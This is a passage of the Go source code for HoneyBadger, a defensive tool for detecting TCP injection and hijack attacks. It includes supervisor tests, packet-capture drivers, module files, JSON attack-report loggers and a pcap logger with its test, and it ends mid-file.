packetObserverChan: make(chan bool, 0),
}
return types.PacketLogger(&m)
}
func (m *MockPacketLogger) WritePacket(rawPacket []byte, timestamp time.Time) {
log.Print("MockPacketLogger.WritePacket")
m.packetObserverChan <- true
}
func (m *MockPacketLogger) SetFileWriter(writer io.WriteCloser) {
}
func (m *MockPacketLogger) Start() {
log.Print("MockPacketLogger.Start")
}
func (m *MockPacketLogger) Stop() {
log.Print("MockPacketLogger.Stop")
}
func (m *MockPacketLogger) Archive() {
}
func (m *MockPacketLogger) Remove() {
}
func SetupTestInquisitor() (*Supervisor, PacketDispatcher, types.PacketSource) {
tcpIdleTimeout, _ := time.ParseDuration("10m")
dispatcherOptions := DispatcherOptions{
BufferedPerConnection: 10,
BufferedTotal: 100,
LogDir: ".",
LogPackets: true,
TcpIdleTimeout: tcpIdleTimeout,
MaxRingPackets: 40,
Logger: logging.NewAttackMetadataJsonLogger("archives"),
DetectHijack: true,
DetectInjection: true,
DetectCoalesceInjection: true,
MaxConcurrentConnections: 100,
}
wireDuration, _ := time.ParseDuration("3s")
snifferOptions := types.SnifferDriverOptions{
Device: "myInterface",
Filename: "",
WireDuration: wireDuration,
Snaplen: 65536,
Filter: "tcp",
}
factory := mockConnFactory{}
mockPacketLoggerFactory := MockPacketLoggerFactory{}
options := SupervisorOptions{
SnifferDriverOptions: &snifferOptions,
DispatcherOptions: dispatcherOptions,
SnifferFactory: NewMockSniffer,
ConnectionFactory: &factory,
PacketLoggerFactory: mockPacketLoggerFactory,
}
supervisor := NewSupervisor(options)
go supervisor.Run()
sniffer := supervisor.GetSniffer()
startedChan := sniffer.GetStartedChan()
dispatcher := supervisor.GetDispatcher()
<-startedChan
return supervisor, dispatcher, sniffer
}
func TestInquisitorForceQuit(t *testing.T) {
supervisor, _, _ := SetupTestInquisitor()
var sig os.Signal
supervisor.forceQuitChan <- sig
}
func TestInquisitorSourceStopped(t *testing.T) {
supervisor, _, sniffer := SetupTestInquisitor()
sniffer.Stop()
supervisor.Stopped()
}
func TestInquisitorSourceReceiveOne(t *testing.T) {
_, dispatcher, sniffer := SetupTestInquisitor()
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
Seq: 3,
SYN: false,
SrcPort: 1,
DstPort: 2,
}
flow := types.NewTcpIp4FlowFromLayers(ip, tcp)
p := types.PacketManifest{
Timestamp: time.Now(),
Flow: flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
connsChan := dispatcher.GetObservedConnectionsChan(1)
log.Print("before receive packet")
dispatcher.ReceivePacket(&p)
log.Print("after receive packet")
<-connsChan
log.Print("after connsChan receive")
conns := dispatcher.Connections()
log.Print("fu3")
if len(conns) != 1 {
t.Fatalf("number of connections %d is not 1", len(conns))
}
conn := conns[0]
mockConn := conn.(*MockConnection)
log.Print("listen to packet observer chan")
<-mockConn.packetObserverChan
sniffer.Stop()
}
func TestInquisitorResetTwice(t *testing.T) {
_, dispatcher, sniffer := SetupTestInquisitor()
startSeq := 3
ip1 := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp1 := layers.TCP{
Seq: uint32(startSeq),
SYN: false,
RST: true,
SrcPort: 1,
DstPort: 2,
}
flow1 := types.NewTcpIp4FlowFromLayers(ip1, tcp1)
packet1 := types.PacketManifest{
Timestamp: time.Now(),
Flow: flow1,
IPv4: &ip1,
TCP: &tcp1,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
ip2 := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp2 := layers.TCP{
Seq: uint32(startSeq + len(packet1.Payload)),
SYN: false,
RST: true,
SrcPort: 1,
DstPort: 2,
}
flow2 := types.NewTcpIp4FlowFromLayers(ip2, tcp2)
packet2 := types.PacketManifest{
Timestamp: time.Now(),
Flow: flow2,
IPv4: &ip2,
TCP: &tcp2,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
connsChan := dispatcher.GetObservedConnectionsChan(1)
dispatcher.ReceivePacket(&packet1)
<-connsChan
conns := dispatcher.Connections()
if len(conns) != 1 {
t.Fatalf("number of connections %d is not 1", len(conns))
}
conn := conns[0]
mockConn := conn.(*MockConnection)
<-mockConn.packetObserverChan
conns = dispatcher.Connections()
if len(conns) != 1 {
t.Fatalf("number of connections %d is not 1", len(conns))
}
conn = conns[0]
mockConn = conn.(*MockConnection)
dispatcher.ReceivePacket(&packet2)
<-mockConn.packetObserverChan
sniffer.Stop()
}
func SetupRealConnectionInquisitor() (*Supervisor, PacketDispatcher, types.PacketSource) {
tcpIdleTimeout, _ := time.ParseDuration("10m")
dispatcherOptions := DispatcherOptions{
BufferedPerConnection: 10,
BufferedTotal: 100,
LogDir: ".",
LogPackets: true,
TcpIdleTimeout: tcpIdleTimeout,
MaxRingPackets: 40,
Logger: logging.NewAttackMetadataJsonLogger("archives"),
DetectHijack: true,
DetectInjection: true,
DetectCoalesceInjection: true,
MaxConcurrentConnections: 100,
}
wireDuration, _ := time.ParseDuration("3s")
snifferOptions := types.SnifferDriverOptions{
Device: "myInterface",
Filename: "",
WireDuration: wireDuration,
Snaplen: 65536,
Filter: "tcp",
}
factory := &DefaultConnFactory{}
mockPacketLoggerFactory := MockPacketLoggerFactory{}
options := SupervisorOptions{
SnifferDriverOptions: &snifferOptions,
DispatcherOptions: dispatcherOptions,
SnifferFactory: NewMockSniffer,
ConnectionFactory: factory,
PacketLoggerFactory: mockPacketLoggerFactory,
}
supervisor := NewSupervisor(options)
go supervisor.Run()
sniffer := supervisor.GetSniffer()
startedChan := sniffer.GetStartedChan()
dispatcher := supervisor.GetDispatcher()
<-startedChan
return supervisor, dispatcher, sniffer
}
================================================
FILE: drivers/afpacket.go
================================================
// +build linux
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package drivers
import (
"github.com/google/gopacket"
"github.com/google/gopacket/afpacket"
"github.com/david415/HoneyBadger/types"
)
func init() {
SnifferRegister("AF_PACKET", NewAfpacketHandle)
}
type AfpacketHandle struct {
afpacketHandle *afpacket.TPacket
}
func NewAfpacketHandle(options *types.SnifferDriverOptions) (types.PacketDataSourceCloser, error) {
afpacketHandle, err := afpacket.NewTPacket(afpacket.OptInterface(options.Device))
return &AfpacketHandle{
afpacketHandle: afpacketHandle,
}, err
}
func (a *AfpacketHandle) ReadPacketData() (data []byte, ci gopacket.CaptureInfo, err error) {
return a.afpacketHandle.ReadPacketData()
}
func (a *AfpacketHandle) Close() error {
a.afpacketHandle.Close()
return nil
}
================================================
FILE: drivers/bpf.go
================================================
// +build darwin dragonfly freebsd netbsd openbsd
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package drivers
import (
"github.com/google/gopacket"
"github.com/google/gopacket/bsdbpf"
"github.com/david415/HoneyBadger/types"
)
func init() {
SnifferRegister("BSD_BPF", NewBPFHandle)
}
type BPFHandle struct {
bpfSniffer *bsdbpf.BPFSniffer
}
func NewBPFHandle(options *types.SnifferDriverOptions) (types.PacketDataSourceCloser, error) {
// XXX TODO pass more options...
bpfSniffer, err := bsdbpf.NewBPFSniffer(options.Device, nil)
return &BPFHandle{
bpfSniffer: bpfSniffer,
}, err
}
func (a *BPFHandle) ReadPacketData() (data []byte, ci gopacket.CaptureInfo, err error) {
return a.bpfSniffer.ReadPacketData()
}
func (a *BPFHandle) Close() error {
return a.bpfSniffer.Close()
}
================================================
FILE: drivers/libpcap.go
================================================
// +build linux freebsd solaris
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package drivers
import (
"github.com/google/gopacket"
"github.com/google/gopacket/pcap"
"time"
"github.com/david415/HoneyBadger/types"
)
func init() {
SnifferRegister("libpcap", NewPcapSniffer)
}
type PcapHandle struct {
handle *pcap.Handle
}
func NewPcapSniffer(options *types.SnifferDriverOptions) (types.PacketDataSourceCloser, error) {
if options.Filename != "" {
pcapFileHandle, err := pcap.OpenOffline(options.Filename)
pcapHandle := PcapHandle{
handle: pcapFileHandle,
}
return &pcapHandle, err
} else {
pcapWireHandle, err := pcap.OpenLive(options.Device, options.Snaplen, true, options.WireDuration)
pcapHandle := PcapHandle{
handle: pcapWireHandle,
}
err = pcapHandle.handle.SetBPFFilter(options.Filter)
return &pcapHandle, err
}
}
func NewPcapFileSniffer(filename string) (*PcapHandle, error) {
pcapFileHandle, err := pcap.OpenOffline(filename)
pcapHandle := PcapHandle{
handle: pcapFileHandle,
}
return &pcapHandle, err
}
func NewPcapWireSniffer(netDevice string, snaplen int32, wireDuration time.Duration, filter string) (*PcapHandle, error) {
pcapWireHandle, err := pcap.OpenLive(netDevice, snaplen, true, wireDuration)
pcapHandle := PcapHandle{
handle: pcapWireHandle,
}
err = pcapHandle.handle.SetBPFFilter(filter)
return &pcapHandle, err
}
func (p *PcapHandle) ReadPacketData() (data []byte, ci gopacket.CaptureInfo, err error) {
return p.handle.ReadPacketData()
}
func (p *PcapHandle) Close() error {
p.handle.Close()
return nil
}
================================================
FILE: drivers/pcapgo.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package drivers
import (
"io"
"os"
"github.com/google/gopacket"
"github.com/google/gopacket/pcapgo"
"github.com/david415/HoneyBadger/types"
)
func init() {
SnifferRegister("pcapgo", NewPcapgoHandle)
}
type PcapgoHandle struct {
reader *pcapgo.Reader
fileReader io.ReadCloser
}
func NewPcapgoHandle(options *types.SnifferDriverOptions) (types.PacketDataSourceCloser, error) {
fileReader, err := os.Open(options.Filename)
if err != nil {
return nil, err
}
reader, err := pcapgo.NewReader(fileReader)
if err != nil {
return nil, err
}
return &PcapgoHandle{
reader: reader,
fileReader: fileReader,
}, nil
}
func (a *PcapgoHandle) ReadPacketData() ([]byte, gopacket.CaptureInfo, error) {
data, ci, err := a.reader.ReadPacketData()
return data, ci, err
}
func (a *PcapgoHandle) Close() error {
return a.fileReader.Close()
}
================================================
FILE: drivers/register.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package drivers
import (
"github.com/david415/HoneyBadger/types"
)
var Drivers = map[string]func(*types.SnifferDriverOptions) (types.PacketDataSourceCloser, error){}
// Register makes a ethernet sniffer driver available by the provided name.
// If Register is called twice with the same name or if driver is nil, it panics.
func SnifferRegister(name string, packetDataSourceCloserFactory func(*types.SnifferDriverOptions) (types.PacketDataSourceCloser, error)) {
if packetDataSourceCloserFactory == nil {
panic("sniffer: packetDataSourceCloserFactory is nil")
}
if _, dup := Drivers[name]; dup {
panic("sniffer: Register called twice for ethernet sniffer " + name)
}
Drivers[name] = packetDataSourceCloserFactory
}
================================================
FILE: go.mod
================================================
module github.com/david415/HoneyBadger
go 1.13
require (
github.com/fatih/color v1.7.0
github.com/google/gopacket v1.1.17
github.com/mattn/go-colorable v0.1.4 // indirect
github.com/mattn/go-isatty v0.0.11 // indirect
)
================================================
FILE: go.sum
================================================
github.com/fatih/color v1.7.0 h1:DkWD4oS2D8LGGgTQ6IvwJJXSL5Vp2ffcQg58nFV38Ys=
github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
github.com/google/gopacket v1.1.17 h1:rMrlX2ZY2UbvT+sdz3+6J+pp2z+msCq9MxTU6ymxbBY=
github.com/google/gopacket v1.1.17/go.mod h1:UdDNZ1OO62aGYVnPhxT1U6aI7ukYtA/kB8vaU0diBUM=
github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM=
github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3 h1:0GoQqolDA55aaLxZyTzK/Y2ePZzZTUrRacwib7cNsYQ=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190405154228-4b34438f7a67 h1:1Fzlr8kkDLQwqMP8GxrhptBLqZG/EDpiATneiZHY998=
golang.org/x/sys v0.0.0-20190405154228-4b34438f7a67/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20191026070338-33540a1f6037 h1:YyJpGZS1sBuBCzLAR1VEpK193GlqGZbnPFnPV/5Rsb4=
golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
================================================
FILE: logging/attack_logger.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package logging
import (
"encoding/base64"
"encoding/json"
"fmt"
"github.com/david415/HoneyBadger/types"
"io"
"os"
"path/filepath"
"time"
)
type SerializedEvent struct {
Type string
Time time.Time
PacketCount uint64
Flow string
HijackSeq uint32
HijackAck uint32
Payload string
Winner string
Loser string
Base, Start, End types.Sequence
}
// AttackJsonLogger is responsible for recording all attack reports as JSON objects in a file.
type AttackJsonLogger struct {
writer io.WriteCloser
ArchiveDir string
stopChan chan bool
attackReportChan chan *types.Event
}
// NewAttackJsonLogger returns a pointer to a AttackJsonLogger struct
func NewAttackJsonLogger(archiveDir string) *AttackJsonLogger {
a := AttackJsonLogger{
ArchiveDir: archiveDir,
stopChan: make(chan bool),
attackReportChan: make(chan *types.Event),
}
return &a
}
func (a *AttackJsonLogger) Start() {
go a.receiveReports()
}
func (a *AttackJsonLogger) Stop() {
a.stopChan <- true
}
func (a *AttackJsonLogger) receiveReports() {
for {
select {
case <-a.stopChan:
return
case unserializedReport := <-a.attackReportChan:
a.SerializeAndWrite(unserializedReport)
}
}
}
func (a *AttackJsonLogger) Log(event *types.Event) {
a.attackReportChan <- event
}
func (a *AttackJsonLogger) SerializeAndWrite(event *types.Event) {
serialized := &SerializedEvent{
Type: event.Type,
PacketCount: event.PacketCount,
Flow: event.Flow.String(),
HijackSeq: event.HijackSeq,
HijackAck: event.HijackAck,
Time: event.Time,
Payload: base64.StdEncoding.EncodeToString(event.Payload),
Winner: base64.StdEncoding.EncodeToString(event.Winner),
Loser: base64.StdEncoding.EncodeToString(event.Loser),
Base: event.Base,
Start: event.Start,
End: event.End,
}
a.Publish(serialized)
}
// Publish writes a JSON report to the attack-report file for that flow.
func (a *AttackJsonLogger) Publish(event *SerializedEvent) {
b, err := json.Marshal(event)
logName := filepath.Join(a.ArchiveDir, fmt.Sprintf("%s.attackreport.json", event.Flow))
a.writer, err = os.OpenFile(logName, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666)
if err != nil {
panic(fmt.Sprintf("error opening file: %v", err))
}
defer a.writer.Close()
a.writer.Write([]byte(fmt.Sprintf("%s\n", string(b))))
}
================================================
FILE: logging/metadata_attack_logger.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package logging
import (
"encoding/json"
"fmt"
"github.com/david415/HoneyBadger/types"
"io"
"os"
"path/filepath"
)
// AttackMetadataJsonLogger is responsible for recording all attack reports as JSON objects in a file.
// This attack logger only logs metadata... but ouch code duplication.
type AttackMetadataJsonLogger struct {
writer io.WriteCloser
ArchiveDir string
stopChan chan bool
attackReportChan chan *types.Event
}
// NewAttackMetadataJsonLogger returns a pointer to a AttackMetadataJsonLogger struct
func NewAttackMetadataJsonLogger(archiveDir string) *AttackMetadataJsonLogger {
a := AttackMetadataJsonLogger{
ArchiveDir: archiveDir,
stopChan: make(chan bool),
attackReportChan: make(chan *types.Event),
}
return &a
}
func (a *AttackMetadataJsonLogger) Start() {
go a.receiveReports()
}
func (a *AttackMetadataJsonLogger) Stop() {
a.stopChan <- true
}
func (a *AttackMetadataJsonLogger) receiveReports() {
for {
select {
case <-a.stopChan:
return
case event := <-a.attackReportChan:
a.SerializeAndWrite(event)
}
}
}
func (a *AttackMetadataJsonLogger) Log(event *types.Event) {
a.attackReportChan <- event
}
func (a *AttackMetadataJsonLogger) SerializeAndWrite(event *types.Event) {
publishableEvent := &SerializedEvent{
Type: event.Type,
PacketCount: event.PacketCount,
Flow: event.Flow.String(),
HijackSeq: event.HijackSeq,
HijackAck: event.HijackAck,
Time: event.Time,
Base: event.Base,
Start: event.Start,
End: event.End,
}
a.Publish(publishableEvent)
}
// Publish writes a JSON report to the attack-report file for that flow.
func (a *AttackMetadataJsonLogger) Publish(event *SerializedEvent) {
b, err := json.Marshal(*event)
logName := filepath.Join(a.ArchiveDir, fmt.Sprintf("%s.metadata-attackreport.json", event.Flow))
a.writer, err = os.OpenFile(logName, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666)
if err != nil {
panic(fmt.Sprintf("error opening file: %v", err))
}
defer a.writer.Close()
a.writer.Write([]byte(fmt.Sprintf("%s\n", string(b))))
}
================================================
FILE: logging/pcap_logger.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package logging
import (
"fmt"
"io"
"os"
"path/filepath"
"time"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcapgo"
"github.com/david415/HoneyBadger/types"
)
type TimedPacket struct {
RawPacket []byte
Timestamp time.Time
}
// PcapLogger struct is used to log packets to a pcap file
type PcapLogger struct {
packetChan chan TimedPacket
stopChan chan bool
AckChan *chan bool
LogDir string
ArchiveDir string
Flow *types.TcpIpFlow
writer *pcapgo.Writer
FileWriter io.WriteCloser
pcapLogNum int
pcapQuota int
basename string
}
func NewPcapLogger(logDir, archiveDir string, flow *types.TcpIpFlow, pcapLogNum int, pcapQuota int) *PcapLogger {
p := PcapLogger{
packetChan: make(chan TimedPacket),
stopChan: make(chan bool),
AckChan: nil,
Flow: flow,
LogDir: logDir,
ArchiveDir: archiveDir,
pcapLogNum: pcapLogNum,
pcapQuota: pcapQuota,
}
p.basename = filepath.Join(p.LogDir, fmt.Sprintf("%s.pcap", p.Flow))
p.FileWriter = NewRotatingQuotaWriter(p.basename, p.pcapQuota, p.pcapLogNum, p.WriteHeader)
p.writer = pcapgo.NewWriter(p.FileWriter)
return &p
}
type PcapLoggerFactory struct {
LogDir string
ArchiveDir string
PcapLogNum int
PcapQuota int
}
func NewPcapLoggerFactory(logDir, archiveDir string, pcapLogNum, pcapQuota int) PcapLoggerFactory {
return PcapLoggerFactory{
LogDir: logDir,
ArchiveDir: archiveDir,
PcapLogNum: pcapLogNum,
PcapQuota: pcapQuota,
}
}
func (f PcapLoggerFactory) Build(flow *types.TcpIpFlow) types.PacketLogger {
return NewPcapLogger(f.LogDir, f.ArchiveDir, flow, f.PcapLogNum, f.PcapQuota)
}
func (p *PcapLogger) SetFileWriter(writer io.WriteCloser) {
p.FileWriter = writer
p.writer = pcapgo.NewWriter(p.FileWriter)
}
func (p *PcapLogger) WriteHeader() {
err := p.writer.WriteFileHeader(65536, layers.LinkTypeEthernet)
if err != nil {
panic(err)
}
}
func (p *PcapLogger) Start() {
go p.logPackets()
}
func (p *PcapLogger) Stop() {
p.stopChan <- true
p.FileWriter.Close()
}
func (p *PcapLogger) Archive() {
newBasename := filepath.Join(p.ArchiveDir, filepath.Base(p.basename))
os.Rename(p.basename, newBasename)
for i := 1; i < p.pcapLogNum+1; i++ {
os.Rename(filepath.Join(p.LogDir, fmt.Sprintf("%s.pcap.%d", p.Flow.String(), i)), fmt.Sprintf("%s.%d", newBasename, i))
}
}
func (p *PcapLogger) logPackets() {
for {
select {
case <-p.stopChan:
return
case timedPacket := <-p.packetChan:
p.WritePacketToFile(timedPacket.RawPacket, timedPacket.Timestamp)
if p.AckChan != nil {
c := p.AckChan
*c <- true
}
}
}
}
func (p *PcapLogger) Remove() {
os.Remove(p.basename)
for i := 1; i < p.pcapLogNum+1; i++ {
os.Remove(filepath.Join(p.LogDir, fmt.Sprintf("%s.pcap.%d", p.Flow, i)))
}
}
func (p *PcapLogger) WritePacket(rawPacket []byte, timestamp time.Time) {
p.packetChan <- TimedPacket{
RawPacket: rawPacket,
Timestamp: timestamp,
}
}
func (p *PcapLogger) WritePacketToFile(rawPacket []byte, timestamp time.Time) {
err := p.writer.WritePacket(gopacket.CaptureInfo{
Timestamp: timestamp,
CaptureLength: len(rawPacket),
Length: len(rawPacket),
}, rawPacket)
if err != nil {
panic(err)
}
}
================================================
FILE: logging/pcap_logger_test.go
================================================
package logging
import (
"bytes"
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"log"
"net"
"testing"
"encoding/hex"
"time"
)
func makeTestPacket() []byte {
var testSeq uint32 = 12345
buf := gopacket.NewSerializeBuffer()
opts := gopacket.SerializeOptions{
FixLengths: true,
ComputeChecksums: true,
}
eth := layers.Ethernet{
SrcMAC: net.HardwareAddr{0xde, 0xad, 0xbe, 0xee, 0xee, 0xff},
DstMAC: net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
}
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
SYN: true,
SrcPort: 1,
DstPort: 2,
Seq: testSeq,
BaseLayer: layers.BaseLayer{Payload: []byte{1, 2, 3}},
}
tcp.SetNetworkLayerForChecksum(&ip)
gopacket.SerializeLayers(buf, opts, ð, &ip, &tcp)
packetData := buf.Bytes()
return packetData
}
type TestPcapWriter struct {
lastWrite []byte
}
func NewTestPcapWriter() *TestPcapWriter {
return &TestPcapWriter{}
}
func (w *TestPcapWriter) Write(data []byte) (int, error) {
w.lastWrite = data
return len(data), nil
}
func (w *TestPcapWriter) Close() error {
return nil
}
func TestPcapLogger(t *testing.T) {
ipFlow, _ := gopacket.FlowFromEndpoints(layers.NewIPEndpoint(net.IPv4(1, 2, 3, 4)), layers.NewIPEndpoint(net.IPv4(2, 3, 4, 5)))
tcpFlow, _ := gopacket.FlowFromEndpoints(layers.NewTCPPortEndpoint(layers.TCPPort(1)), layers.NewTCPPortEndpoint(layers.TCPPort(2)))
flow := types.NewTcpIpFlowFromFlows(ipFlow, tcpFlow)
pcapLogger := NewPcapLogger("log-dir", "archive-dir", &flow, 1, 10)
ackChan := make(chan bool)
pcapLogger.AckChan = &ackChan
testWriter := NewTestPcapWriter()
pcapLogger.SetFileWriter(testWriter)
//testWriter.lastWrite = make([]byte, 0)
pcapLogger.Start()
rawPacket := makeTestPacket()
pcapLogger.WritePacket(rawPacket, time.Now())
<- ackChan
log.Printf("before hex dump of %d len bytes\n", len(testWriter.lastWrite))
log.Print(hex.Dump(testWriter.lastWrite))
log.Print("post hex\n")
// XXX TODO test our rotating quota logger for pcap header output on each log file
//want := []byte("\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00")
//if !bytes.Equal(testWriter.lastWrite, want) {
// t.Errorf("pcap header is wrong")
// t.Fail()
//}
if !bytes.Equal(testWriter.lastWrite, rawPacket) {
t.Errorf("pcap packet is wrong")
t.Fail()
}
pcapLogger.Stop()
}
================================================
FILE: logging/rotating_writer.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package logging
import (
"fmt"
"math"
"os"
)
type RotatingQuotaWriter struct {
filename string
fp *os.File
numLogs int
logSize int
quotaSizeBytes int
sizes []int
headerFunc func()
mustWriteHeader bool
}
// NewRotatingQuotaWriter takes a "starting filename" and a quota size in bytes...
// and guarantees to behave as an io.Writer who will write no more than quotaSize
// bytes to disk. `headerFunc` is executed upon the new file, after each rotation.
func NewRotatingQuotaWriter(filename string, quotaSize int, numLogs int, headerFunc func()) *RotatingQuotaWriter {
quotaSizeBytes := quotaSize * 1024 * 1024
logSize := int(math.Floor(float64(quotaSizeBytes) / float64(numLogs)))
if logSize*numLogs > quotaSizeBytes {
panic("wtf: logSize * numLogs > quotaSize")
}
w := &RotatingQuotaWriter{
filename: filename,
numLogs: numLogs,
logSize: logSize,
